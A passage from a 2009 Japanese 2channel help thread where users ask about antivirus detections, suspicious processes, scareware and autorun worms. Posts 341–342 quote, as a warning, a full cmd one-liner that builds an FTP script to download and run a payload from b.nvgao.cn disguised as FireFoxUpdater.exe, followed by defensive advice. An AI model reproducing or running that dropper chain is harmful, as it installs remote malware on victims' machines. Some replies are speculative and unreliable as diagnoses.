やばいですかね?;
294:名無しさん@お腹いっぱい。
09/01/07 00:48:58
全部cookieを利用したスパイウェア。
スパイウェアといっても個人情報を盗んだりはしないが、PCが重くなったりはするかも。
サードパーティーのcookieを拒否すれば大抵のものは弾けると思う。
そんなことより
>【Microsoft Update(MU)の状態】 「何スかそれ・・」
今すぐやって来い。詳細はググれ。
295:名無しさん@お腹いっぱい。
09/01/07 08:14:09
了解です!
296:名無しさん@お腹いっぱい。
09/01/07 18:34:19
TrackingCookieはスパイウエアじゃねえが・・・・・・
297:名無しさん@お腹いっぱい。
09/01/07 20:55:23
【使用OS】 「xp pro sp3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「ウイルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
今日行った検索でTROJ_Generic.DITというものが見つかりました
以下のものに感染していたようです
wingogo.ex_
CyberLink\PowerDVD\Language\Enu\pdvd7_dvdaudio\pdvd7_dvdaudio.html
CyberLink\PowerDVD\Language\Kor\pdvd7_dvdaudio\pdvd7_dvdaudio.html
compile\petit\readme_e.html
感染ファイルは隔離後に削除してます
その後の手動検索ではみつかってません
TROJ_Generic.DITがどんなウイルスなのか検索してもうまく見つからず
削除しとけば安心なのか心配です
対策法をご教授いただけたらと思います
298:名無しさん@お腹いっぱい。
09/01/07 21:32:56
>>297
隔離したファイルはすぐに削除せずにしばらく様子見した方がいいよ
実は誤検知で、数日後に定義の修正があること多いからね
VirusTotalとかJotti's malware scanを利用するといい
299:名無しさん@お腹いっぱい。
09/01/07 21:47:59
個人情報が入っているファイルがあって、それはWinRARでパスワードを掛けて圧縮していて
編集するときは、一時的にTempファイルに解凍した状態でファイルに保存することなく編集するようにしています
それが、いつのまにか勝手にデスクトップに解凍されているという現象が今までに2度ほど起きているのですが、
これはトロイ等に感染していると思ったほうがいいのでしょうか?
ノートンを使用しているので、ノートンでスキャンを行うも2度とも検出されませんでした
非常に不安になり2度とも変更が必要と思われる情報は変更を行ったのですが今のところ実害はない状態です
300:名無しさん@お腹いっぱい。
09/01/07 22:33:25
すみません、テンプレ読んでませんでした。
どうかよろしくお願いします。
【使用OS】 Windows XP Pro SP3
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 Norton Internet Security (10.2.0.30)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」
301:名無しさん@お腹いっぱい。
09/01/07 22:33:56
299=300です
302:名無しさん@お腹いっぱい。
09/01/08 23:44:00
trdhost.exe とは何者でしょうか?rdhost.exeではなく tdrhost.exeでした。
Googleで調べても出てこず,不安になって消しましたが,いったい何だったのか逆に不安になってきました。
回線が上りも下りも微妙に使っている状態だったので不審に思いタスクマネージャをみると,CPU使用率が1~3になっては0になる不振なexeを見つけました。
それがtrdhost.exeなのですが,窓の手を見る限りスタートアップではないし,ウイルスバスターも反応せず,そもそも情報がないということで気味が悪いです。
消したら不振なデータ移送は止まりましたが,不安です……
どなたかtrdhost.exeについてご存じの方は,お教えください……
【使用OS】 「Win XP pro SP3」
【使用セキュリティソフトとバージョン】 「セキュリティ対策ツール Ver. 1.5 (ウイルスバスター?)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「上記のものがが兼ねてると思う」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「NTT光プレミアムから借りてるルーター」
303: ◆N9P3SuvBPo
09/01/09 01:00:29
>302
tdrhost.exeのプロパティを見れば、大まかな情報は分かる
怪しいと思ったらvirustotalでスキャンして正体を突き止める
304:名無しさん@お腹いっぱい。
09/01/09 01:45:51
tdrなのかtrdなのか
305:302
09/01/09 01:54:51
>>303-304 trdです。C:\WINDOWS\Prefetch 内に TRDHOST.EXE-2EAF3965.pf がありましたが,本体とおぼしき物は見つかりませんでした。
これをVirustotalでスキャンしましたが,何も反応はありませんでした。
取りあえず今のところは問題ないので,様子を見てみようと思います。ありがとうございました。
306:名無しさん@お腹いっぱい。
09/01/09 13:25:36
>>297
自分もウイルスバスターで同じものでました。
一週間前にスキャンして終了してから初起動した時に検出されたんで誤検知を疑ってます。
307:名無しさん@お腹いっぱい。
09/01/09 19:08:09
>>299
WinRARは機能豊富だから、オペミスでは?気になるなら複数のベンダーでオンラインスキャン
してみると良いよ。
>>305
プリフェッチファイル(pf)は本体と別の形式だから、それ調べてみても詳細は判らないよ。
よく「消してしまった」の後で、ウイルスですか?質問多いけど、隔離されてるなら心配な
いから、303の言うようにまず調べてみるのがよいね。
308:302
09/01/10 00:15:20
Windows/system32/trdhost.exe が犯人だと分かりましたが,System32フォルダを覗いてもそれはありませんでした。
とりあえずパスをvirustotalに打ち込むと何やらアップロードしたら,いくつかの検査ソフトが反応していました。
しかし『隠しファイルを表示する』にしてもtrdは見えず,消すことが出来ません。
プロセスに表示されるので存在するのでしょうが……
またあれから注意深く監視してみましたが,勝手に送受信するようなことはありませんでした。
なので時限爆弾を抱えてるつもりで,ウイルスとして判断されるまで付き合っていくしかありません……
309:名無しさん@お腹いっぱい。
09/01/10 00:29:32
ファイルとレジストリは隠すのに、プロセスを隠さないルートキットなんてあるの?
310:名無しさん@お腹いっぱい。
09/01/10 00:41:32
間抜けなルートキットなんだろ
SafeModeで見えますとかまれによくある
311:名無しさん@お腹いっぱい。
09/01/10 00:50:15
> まれによくある
どっちだよw
とりあえず、>>308はルートキットスキャナを使ってみた方がいいな。
312:名無しさん@お腹いっぱい。
09/01/10 17:25:04
>>297
それ私も検知されました。
一週間前に検索したところ、反応なかったのですが…
今は隔離させています。
てか、セキュリティダッシュボード上では検知されてないのですよね。
313:名無しさん@お腹いっぱい。
09/01/11 10:06:43
>>297
うちもそれでたよ
前に検索した時は検出されなかったんだけど
今は>>312と同じで隔離中です
隔離する前に、シマンテックのオンラインスキャンかけたら、検出はされなかったです
314:名無しさん@お腹いっぱい。
09/01/11 13:44:41
★質問用テンプレ★
【使用OS】 「WindowsXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! バージョン4.8-1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Spybot-Search&Destroy」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
・DoubleClick
・KGBkeylogger
・Microsoft.Windows.Explorer
・Microsoft.WindowsSecurityCenter.TaskManager
・Right Media
Spybot-Search&Destroyで何度削除しても検知されます。
315:名無しさん@お腹いっぱい。
09/01/11 14:58:32
>>297
わたしも8日にウイルスバスターで検知されました。
始めてウイルス検知されたもんで(バスター2年使用)
あせって感染ファイルを確かめずに削除してしまいました…
その後手動検索しましたが何も検知されません。
大丈夫なのでしょうか。
316:名無しさん@お腹いっぱい。
09/01/11 20:04:23
【使用OS】 「XP home sp2」
【Microsoft Update(MU)の状態】 「最近やってません」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2007を一年延長してます」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【ルータの有無】 「NTTのを使用」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
マイスペやってたら変な所をクリックしたらしく
stabilityinternetscan.comというサイトに飛ばされ、「ウイルス感染してるから
セキュリティソフトをダウンロードしろ」とメッセージが出たので「いいえ」を
クリックして接続切ったんですが、ノートンでチェックしても異常は出ず、ググッたら
URLリンク(www.precisesecurity.com)
URLリンク(www.precisesecurity.com)
「System security」というソフトをインストールさせるための騙しサイト
らしいとわかりました。
ユーザーの書き込みをみるとポップアップが出て来るようですが私のPCには
出て来ません。
これは感染せずに済んでいるんでしょうか?
余計なクリックせずに接続切ればよかったんでしょうが「いいえ」をクリックして
しまったので気になります。
ノートンのウイルスリストには入ってなくて感染してるかどうかがわからないんです。
317:名無しさん@お腹いっぱい。
09/01/11 20:40:38
>>316
exeをダウンロードして実行していなければ問題なし
318:名無しさん@お腹いっぱい。
09/01/11 21:24:42
>>317
ありがとうございます、安心しました。
319:名無しさん@お腹いっぱい。
09/01/12 22:10:53
最近インターネットにアクセスすると
蜘蛛のアニメーションが出てくるようになりました
画面上を動き回ります。
こいつの影響なのか接続も遅くなったようです
スキャンでは検出されません
何か良い解決策を教えてください
320:名無しさん@お腹いっぱい。
09/01/13 00:47:48
使用OS】 Windows XP
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウイルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 済
【スパイウェア対策ソフト】 ウイルスバスター2009
【スパイウェア対策ソフトの更新は定期的に行なっているか】 済
【ルータの有無】 有
外付けHDDをチェックしたところTROJ Generic.DITが検出されました
トロイの木馬の一種のようですがググってもよく分かりません
これがどのような悪さをするのかご存知の方、教えてください
321:名無しさん@お腹いっぱい。
09/01/13 01:21:31
マルチウゼー
322:名無しさん@お腹いっぱい。
09/01/13 02:37:58
>>320
マジレスするとJavaScript関係、キャッシュを消せば解決
323:名無しさん@お腹いっぱい。
09/01/13 03:17:18
>>320
ドライブの復元ポイントに忍び込んでるタイプ。復元ポイントを削除すれば消える
324:初心者
09/01/13 19:18:16
RemoteAdmin.Win32.RemotelyAnywhere.o
ってウイルスを検知したんですがどんな悪さをするか教えて欲しいです。
御願いします。
325:名無しさん@お腹いっぱい。
09/01/13 22:54:25
>>324
今出てる具体的な症状をできるだけ詳細に述べてくれ。ただ個人的にはRemoteAdmin、RemotelyAnywhereってので何となく想像できる
326:名無しさん@お腹いっぱい。
09/01/13 22:57:34
>>319
OS再インスコも覚悟。スキャンで検出できず自力での削除も不可能なら危険、データが無事なうちに早めにする。そのうちブルーの画面が出てPCが攻撃されてますって英語で出てくることもある。
327:名無しさん@お腹いっぱい。
09/01/13 23:40:16
>>326
やっぱ有名なウイルスなんでしょうか?
蜘蛛のアニメが画面上に出てくるって
超冷や汗ものですよ
リカバリってことですよね
ありがとうございました
328:名無しさん@お腹いっぱい。
09/01/14 01:25:47
>>327
名前忘れたけど厄介だってのは知ってる。デスクトップに置いてあるデータも被害なく外付けに退避させられるからいいものの・・
確かに超冷や汗ものの一つだな。関わりたくないものの一つだ
こいつはダウンロードものに感染してるんじゃなくて海外サイト経由でひっかかるタイプだった気がする。
未知の海外サイト見る時はaguse gatewayを使った方が無難。危険なところも安全に見れる
今後の参考にしてくれ。多分最近見たサイトのどれかのはずだ
329:名無しさん@お腹いっぱい。
09/01/14 01:31:28
【使用OS】 Windows XP pro
【Microsoft Update(MU)の状態】 sp3にしてない状態
【使用セキュリティソフトとバージョン】 カスペアンチウイルス2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果】検出なし
最近system32にb33r06hF.exe.a_aとかmqM471x7.exe.a_aというファイルがたびたび出現します。
mqM471x7の方ができた場合、IEが自動起動・自動closeが3分おきくらいに繰り返されます。
スパイウェアなような気もしますが、
ぐぐっても特に情報が見つからなかったため、とりあえずこちらに書かせていただきました。
もし何かご存知の方おりましたら、情報いただけませんか?
330:名無しさん@お腹いっぱい。
09/01/14 02:04:57
>>329
つURLリンク(www.google.co.jp)
つURLリンク(www.trendmicro.co.jp)
331:名無しさん@お腹いっぱい。
09/01/14 09:55:15
>>330
どうもありがとうございます。
ファイル名でなく、拡張子で検索すればよかったんですね・・・
332:名無しさん@お腹いっぱい。
09/01/14 20:08:26
>>297
私のPCでも検出されましたので、トレンドマイクロに連絡しました。
今日メールで、「誤検出であったため最新のパターンファイルで対応した」との回答があり、
検索したら出なくなりました。
333:名無しさん@お腹いっぱい。
09/01/14 22:08:13
>>332
320と同じやつだな。DITだから誤検出か未知のウィルスか迷っていたが・・
結局気分悪いんで消しちまった。結構な数の人が検出されてたらしい
334:通りすがり
09/01/14 23:26:11
私もこの〔TROJ_Generic.DIT〕が名無しさんと同じファイル
〔午後のこ~だ〕と〔CyberLink PowerDVD〕+〔ジャストシステム〕で検出されましたので
トレンドマイクロに問い合わせ、指示に従いそのファイルを添付して調べてもらったところ
下記のような回答が来ました。
*****************************
今回検出されたファイルにつきましては、弊社にて解析の結果、
正常なファイルであると確認できましたので、ウイルスバスターの
誤検出となります。
現在はパターンファイル[5.767.50]にて修正済ですので、アップデート
を行っていただき検出されないか、ご確認いただきますようお願い
いたします。
*****************************
と言うことでしたので、実行するとすべてOKでした。
ウイルスバスター2009の誤検出だっただけのようです。
335:名無しさん@お腹いっぱい。
09/01/15 00:59:31
すみません。
WORM-VB.Ciiというウイルスがウイルスバスターで検出されたんですが、
どんな悪さをするんでしょうか?
目立った不具合は特にないのですが、パソコン(今年で五年目)の動きが遅く感じます。
教えてください。よろしくお願いいたします。
336:名無しさん@お腹いっぱい。
09/01/15 10:47:32
ウイルスバスターの検出名じゃないと思うんだが。
337:初心者
09/01/15 11:19:36
>>325さん
具体的な被害はないねんけど、ウィルスセキュリティをかけたら感染してますって出たんです。
実害はないんですが一応感染してる物をアンインストールしてもう一回セキュリティをかけたら出てこなくなりました。
もう大丈夫なんかな?
338:名無しさん@お腹いっぱい。
09/01/15 11:24:20
>>335
URLリンク(www.trendmicro.co.jp)
最近流行りのUSBメモリなどを介して感染するウイルス。
339:名無しさん@お腹いっぱい。
09/01/15 12:34:39
Ⅱかよ…・
340:名無しさん@お腹いっぱい。
09/01/15 12:52:16
>>335これってキンタマとか山田とか苺キンタマみたいな悪質なもの?
341:名無しさん@お腹いっぱい。
09/01/15 14:02:11
既出だったらごめんよ。
たまーにググるとヒットする「FireFoxUpdater.exe」の情報。
winmgmt(Windows Management Instrumentation)のセキュリティーホールを突い
て外部から潜り込ませるらしい。
以下詳細
まず、外部からwinmgmtを使って以下のコマンドを実行する。
cmd /c echo open b.nvgao.cn>%WINDIR%\WindowsGard&& echo hai
>>%WINDIR%\WindowsGard&& echo 123
>>%WINDIR%\WindowsGard&& echo binary
>>%WINDIR%\WindowsGard&& echo get 8888888888888.exe %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WindowsGard&& echo bye
>>%WINDIR%\WindowsGard&& echo del %WINDIR%\WinA.bat
>>%WINDIR%\WinA.bat&& echo ftp -s:%WINDIR%\WindowsGard>%WINDIR%\WinF.bat&& echo %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WindowsGard
>>%WINDIR%\WinF.bat&& echo cmd /c %WINDIR%\WinA.bat
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WinF.bat
>>%WINDIR%\WinF.bat&& %WINDIR%\winF.bat
※ 実際は改行無しの一行
わかる人はわかると思うが、上記の一行で以下の3つのファイル%WINDIR%(通常はC:\WINNTだね。)が作成され、、、
WinA.bat
WindowsGard
WinF.bat
342:名無しさん@お腹いっぱい。
09/01/15 14:03:09
>>341続き
最後にWinF.batが実行される。
そしてこのWinF.batが(上記を見れば分かると思うがw)
ftp -s:C:\WINNT\WindowsGard
C:\WINNT\FireFoxUpdater.exe
del C:\WINNT\WindowsGard
cmd /c C:\WINNT\WinA.bat
del C:\WINNT\WinF.bat
ftp -sでコマンドファイルを指定している。そしてWindowsGardの中身が(上記を見れば分かると思うがw)
open b.nvgao.cn
hai
123
binary
get 8888888888888.exe C:\WINNT\FireFoxUpdater.exe
bye
分かる人は、b.nvgao.cnで暴るのも(ry
で、FireFoxUpdater.exeをゲット完了後に即実行し・・・・
後はもうやりたい放題にやられちゃうと思います。
防御方法
Windows Management InstrumentationとWindows Management Instrumentation Driver Extensionsのサービス
を無効にする。
ftpコマンド名を変更する(moeftp.exeとかww)
343:名無しさん@お腹いっぱい。
09/01/15 14:44:53
>>342
FireFoxUpdater.exeという名前のウィルスなのですか?
344:名無しさん@お腹いっぱい。
09/01/15 15:18:23
うわぁ・・・
345:名無しさん@お腹いっぱい。
09/01/16 00:49:31
マルウェア対策でフリーソフトのcomodo boなんとかっての使っているが常駐でウップデートした奴を勝手に削除する素晴らしい糞です。
346:名無しさん@お腹いっぱい。
09/01/19 12:15:08
347:名無しさん@お腹いっぱい。
09/01/20 18:09:02
質問させて頂きます。
今まで使用してきたESET SmartSecrityの期限が切れまして、
PCを購入した為1ライセンスで2台使用できるセキュリティソフトを探しております。
PCの用途は専らオンラインゲームか動画鑑賞のみです。
メインPCのCPUはCore2Duo E8600で、メモリは4Gです。
サブPCはAthlon 64 X2 3800+のメモリ1Gです。
今まではサブをメインとして使用しており、そちらにセキュリティソフトを入れていました。
なので現在はメインPCにESET SmartSecrityの体験版、サブPCに期限切れのESET SmartSecrityを入れています。
サブPCは毎日起動しないので、もし無料のavast等でも事足りるのであれば、
メインに有料のソフト、サブに無料ソフトでもかまいません。
オンラインゲームをやることが非常に多いので、アカウントハック等を防げたらいいのですが・・・
PCに関しての知識は疎いので、あまり深いところまではわかりません。
長文・乱文で申し訳ありませんが、どうかよろしくお願いいたします。
【使用OS】 WindowsXP Home SP3
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ESET SmartSecrity
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 ESET SmartSecrity
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
348:名無しさん@お腹いっぱい。
09/01/20 18:34:00
>>347
3PC版なら結構いろんな所から出てると思うが
F-Secure、ノートン、OneCare 等々
349:名無しさん@お腹いっぱい。
09/01/20 23:24:46
>>347
セキュリティーに興味を持って調べてこの板に来たんだからもうちょっと頑張って
性能のいいフリーソフトを使ってみてはどうでしょう(あと若干スレチな気もします)
参考までに↓
【無料】 フリーセキュリティの組合せ 9
スレリンク(sec板)
ちなみにどんなに頑張っても感染するときは気付かずいつの間にかかかるので
あまり神経質になりすぎてもどうかとは思います。
肝心なのは自分にとって使いやすい、きちんと設定できてなるべく検出率が良い
ソフトを使うことだと思います。
あと個人的にESETはよろしくないかと・・・・
E8600ならガチガチにセキュリティー固めても起動時以外で重さを体感出来ることはないので
軽さで選ぶのはやめたほうがいいと思います。(FPS上級者で1ドット単位で狙える人なら別ですが)
350:名無しさん@お腹いっぱい。
09/01/21 03:15:27
URLリンク(www7a.biglobe.ne.jp)
↑のアドレスのサイトにとんだ瞬間にW32.Aliz.Wormというウィルスに
感染したとのメッセージが出てきて
コンピューターウイルスW32.Aliz.Wormのダウンロードが完了しました。
このウイルスはハードディスク内のメモリー内を常に移動するようプログラムされているのでウイルスを駆除することは非常に
困難です。又、非常に感染性が高いのでネットワークを通して次から次へと感染ファイルを増やします。尚、このウイルスには
最初のページでの貴方個人情報を載せてありますのでインターネット上に貴方の個人情報を広めます。
プロパイダから損害賠償など多額な請求が来る可能性があります。ダイアルQ2に接続しましたので回線を切断しても
IPが残るので半永久的に請求が行われます。
更に詳しい詳細は下の詳細ボタンを押してください。
という文の書かれたページに飛んだのですが
本当に感染してしまったのでしょうか?
確認する術を知らないので皆さんのご助力を得たいのですが・・・。
351:名無しさん@お腹いっぱい。
09/01/21 03:21:10
>>350
ちょっとはググれ
URLリンク(www.google.co.jp)
352:名無しさん@お腹いっぱい。
09/01/21 11:31:02
てかそんなアドレス直リンすんなよボケ!
そんなサイトどうせ詐欺サイトなんじゃねーの
353:名無しさん@お腹いっぱい。
09/01/21 13:21:17
(・◎・)免許の更新にいってくる
354:名無しさん@お腹いっぱい。
09/01/21 13:22:03
>>353
誤爆乙
355:名無しさん@お腹いっぱい。
09/01/21 15:23:17
>>350
それ、いたずらサイト。
感染しないの問題ない。放置でOK
356:名無しさん@お腹いっぱい。
09/01/21 16:23:49
今XPをクリーンインストールした直後なんですが、
STOP! SYSTEM MAY REQUIRE IMMEDIATE ATTENTION
Your operating system registry may have errors or be corupt.
以下略
といった内容でRestorefix.comへの誘導の書かれたウィンドウが表示されました。
メッセンジャースパムというものらしいですが
そこに書かれたアドレスにアクセスしなければ平気なんでしょうか?
ドライバ等のアップデートを済ませてこれからXPの更新するところで
アンチウィルスソフトもまだ入れてない状態なのであまりググるのも危険な感じがして不安なんですが・・・。
このままアップデート作業進めて大丈夫なんだろうか・・・。
357:名無しさん@お腹いっぱい。
09/01/21 16:42:18
>>356
メンセンジャースパムはXP標準のサービス機能を悪用して行なわれるスパム
デフォルトではMessengerサービスがONの状態になっているので
手動でOFFにすれば今後届くようなこともない。
URLリンク(www.atmarkit.co.jp)
ついでに言っとくが
リモートアシスタンスやゲストユーザーアカウントも確認して置くように
ONになってると色々まずい
あとサービスのいじり方に慣れたのなら、不要なサービスはOFFにしておくと
安全性は高まる。
358:名無しさん@お腹いっぱい。
09/01/22 07:54:41
【使用OS】 「WinXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスタ-2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なっている」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンしてウィルスを発見したわけではなく、 1/21の夜から今現在まで
ウィルスバスターがしきりに不正変更を拒否しましたとポップアップを表示するようになりました。
【種類】 APIEvent
【検出リソース/プロセスID】 ZwWriteVirtualMemory
【ファイル名】 (空白)
【該当ポリシー】 DLL(プログラムライブラリ)インジェクション
【実行した処理】 確認&拒否
URLリンク(oshiete1.goo.ne.jp)
教えてgooにもまったく同様の症状を訴えている人がいて
回答にある参考URL(トレンドマイクロの対策ページ)を元に原因を探しているのですが、
感染したことを示すファイル類は検索で見つかっていません。
ほぼ同時期に発症しているため気味が悪いのですが、どのように対処をすべきなのでしょうか。
359:名無しさん@お腹いっぱい。
09/01/22 16:45:55
んーネトゲやってる?
360:358
09/01/22 22:05:17
>>359
自分の場合は幾つかネットゲームを経験しており、今はハンゲームのAradや
ダレットのMHFをしています。
361:名無しさん@お腹いっぱい。
09/01/22 23:27:11
>>360
とりあえず同時期にあるということは同時期に何かが更新されたんだと思う。
誤検出の可能性があるけど、確証は無い。
362:名無しさん@お腹いっぱい。
09/01/22 23:37:14
まあ、簡単に言えばnProtectの関係かなぁ、と漠然と思ってるのですが。
自分ネトゲしてないのでよく判らんのです……
試験的に除外してみてもいいかも
363:名無しさん@お腹いっぱい。
09/01/22 23:41:37
まあ、あげとく
364:358
09/01/24 10:07:23
結局今回の動作の原因は分からず、再起動をしたら症状は治まりました。
最終的にウイルスバスターのセキュリティーレポートを確認すると
二日間で425件の不正変更の監視、その内ほぼ全てが確認と拒否でしたが
ZwWriteVirtualMemoryに二回の許可。
ZwCreateThreadに一回の許可がありました。
セーフモードでAdAwareとウイルスバスターを走らせましたが
原因となるプログラムも検出されませんでした。
365:名無しさん@お腹いっぱい。
09/01/24 15:15:27
ウイルスバスターを入れれるんですけどメールを送信してないのに勝手に
「送信メールを検索しました」ってでるんだがどういう状況ですか?
366:名無しさん@お腹いっぱい。
09/01/24 17:51:13
>>358
いずれにせよそれって活動を隠すための手続きだと思うんですよ
ネットゲームのSecurityプログラムなども一部でそういう動きするらしく、
少し前に騒ぎになったこともあったと思うんですけども……
ただ、気になるのはrootkit系ウイルスも良くそういう活動をしたと思うんだよなぁ
ま、このままだとちょっと手が出ないので、アダ被で解析を依頼されて見てはいかがでしょうか?
367:名無しさん@お腹いっぱい。
09/01/24 17:57:32
987 :名無しさん@お腹いっぱい。:2009/01/24(土) 15:14:00
ウイルスバスターを入れれるんですけどメールを送信してないのに勝手に
「送信メールを検索しました」ってでるんだがどういう状況ですか?
368:名無しさん@お腹いっぱい。
09/01/24 22:16:13
【使用OS】Windows XP
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】ウイルスバスター2006
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい
【スパイウェア対策ソフト】ウイルスバスター2006
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
TROJ_TDSS.AXLN
C:\DOCUME~1\●● ~1\LOCALS~1\Temp\TDSScf7d.tmp
制限付のアカウントでは動作できるのですが、
管理者でログインするとデスクトップが表示されたままになります。
クリックやキー操作を受け付けません。
対策法を教えて頂けないでしょうか。
宜しくお願いします。
369:名無しさん@お腹いっぱい。
09/01/25 00:19:16
>>368
セーフモードで同じ? タスクバーは表示されてる?
タスクバーが表示されてなかったら、Ctrl+Shift+Escでタスクマネージャを起動して
「ファイル」->「新しいタスクの実行」で「explorer.exe」を起動してみて。
管理者でログイン出来たら、AVG Anti-Rootkitでスキャンして。
AVG Anti-Rootkit
URLリンク(www.softpedia.com)
370:名無しさん@お腹いっぱい。
09/01/25 02:13:37
>>365
P2P使ってるから
371:368
09/01/25 09:31:10
>>369
おかげさまで解決しました。
ありがとうございました。
372:名無しさん@お腹いっぱい。
09/01/25 16:14:21
オートランのウィルスって他のPCに繋いだことがないUSBにも感染するんですか?
自分のパソコンからUSBにウィルスは移るんでしょうか?
373:名無しさん@お腹いっぱい。
09/01/26 04:21:04
>>372
書き込みが日本語になってないから聞きたいことが良くわからんが……
オートランの拡散経路だけ説明だけする。
オートラン系のウイルス本体は、まずパソコンに感染する。
原因はさまざま。一番多いのはサイトからの感染だと言われてる。
で、そのあウイルスは感染PCに繋がれたUSBメモリに分身をコピーしてUSBを感染させ
その感染したUSBを媒介に、他のPCにも自分のコピーを広けると言う寸法。
以前は一つのファイルをブロックできれば無力化できたんだけど、
感染方法を変えやがったらしいから注意な。
しかし妙に対応が早いし、このウイルスの動きは奇妙。
374:名無しさん@お腹いっぱい。
09/01/26 20:46:21
誰か、google-redirectに感染した場合の対処方法を教えてくれ。
検索しても英語サイトばかりでわかんね。
375: ◆N9P3SuvBPo
09/01/26 20:55:26
>374
>google-redirect
WindowsUpdateサイトやセキュリティベンダーのサイトに接続すると
googleに繋がるというものですね。
それなら『AVG Anti-Rootkit』が効果がありますよ。
お試しあれ
376:名無しさん@お腹いっぱい。
09/01/26 21:15:37
>>372
確かに373の言うとおり、質問が判りにくいなw
>オートランのウィルスって他のPCに繋いだことがないUSBにも感染するんですか?
感染しない。USBとは通常、接続の仕様なので、USBメモリとかUSB接続HDDと表現してほしいね。
ただ、過去に事例が沢山あるが、USBメモリ、HDD、フォトフレーム、MP3プレイヤ等、USB接続を
利用する機器が、工場出荷時から感染していた事例は多く有るので、最新のセキュリティーを使用
することは、もはや必須。
>自分のパソコンからUSBにウィルスは移るんでしょうか?
USBメモリやHDDなど、自分のPCがマルウエアに感染すれば簡単に移る。しかも友人や会社など、周
りに多大な被害をもたらす。(最近、NETから隔離されている警察関連で大問題になってる)
373氏に付け加えるなら、自身で実行してしまう事例。ファイル交換の物、友人からの物、自分で
DLしたもの、まれにメール添付の物、など、自らマルウエアを管理者権限で実行する場合が多い。
又、WinUpdateしていない。ブラウザ自身やフラッシュやブラウザのアドオン(最近ではQuickTimeとか)、
PDFリーダ、他のNET接続するソフト類のアップデートを怠れば、何もしなくても感染する。
最近のNET事情は、知識のある奴でも躊躇するほど悪化していると思うよ。
安全と思われているWebページだって、明日は判らない。
377:名無しさん@お腹いっぱい。
09/01/27 00:52:52
オートラン経由のウィルスって未だにNOD32でしか発見できないの?
AVGとかでは無理か?
378:名無しさん@お腹いっぱい。
09/01/27 01:31:30
対応速度に社別の誤差はあるが発見はできると思う。
まず大手なら検出は可能。
まあ、問題は検出よりブロック、そして駆除だな。
379:名無しさん@お腹いっぱい。
09/01/27 08:25:16
>>375
>WindowsUpdateサイトやセキュリティベンダーのサイトに接続すると
>googleに繋がるというものですね。
ちょっと違うのですが、IE6.0で適当なページ(例えば、googleの検索結果のページなど)の
リンクをクリックすると、ステータスバーにhtURLリンク(google-redirect.com)と出て、
そのリンクにつながりにくい状態になることがある現象です。
でも、英語のページを辞書見ながら読んで、Malwarebytes' Anti-Malwareで解決しました。
ありがとうございました。
380:名無しさん@お腹いっぱい。
09/01/30 14:51:30
>>377
NOD32を使っていた警視庁がやられたのに
寝言は寝てから言ってね業者さん
381:名無しさん@お腹いっぱい。
09/01/30 14:52:43
●警察庁に採用されたウイルス対策ソフトESET Smart Security(NOD32)
URLリンク(shop.s2mall.net)
↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
●警視庁ネットワーク、ウイルス感染…完全復旧週明けまで掛かる見込み
URLリンク(headlines.yahoo.co.jp)
警視庁のオンラインシステムに接続している端末のパソコンが、「W32・Downadup・B」と
呼ばれる新種のネットワーク感染型ウイルスに感染し、同庁がウイルス駆除のため、
22日午後から断続的にオンライン業務を停止していることがわかった。
この影響で、東京都内の警察署で、車庫証明の発行業務や免許更新の事務手続き業務を一時、
手作業で行わざるを得なくなった。完全復旧は週明けの26日になる見込み。
サイバー攻撃など外部からの侵入の恐れは低く、USBメモリーなどをパソコンで使った際に
感染した可能性があるとして、同庁で感染経路を調べている。
382:名無しさん@お腹いっぱい。
09/01/30 15:23:28
ESET終わったな
383:名無しさん@お腹いっぱい。
09/01/30 15:37:17
始まってもいないのに終わったも糞も無いだろw
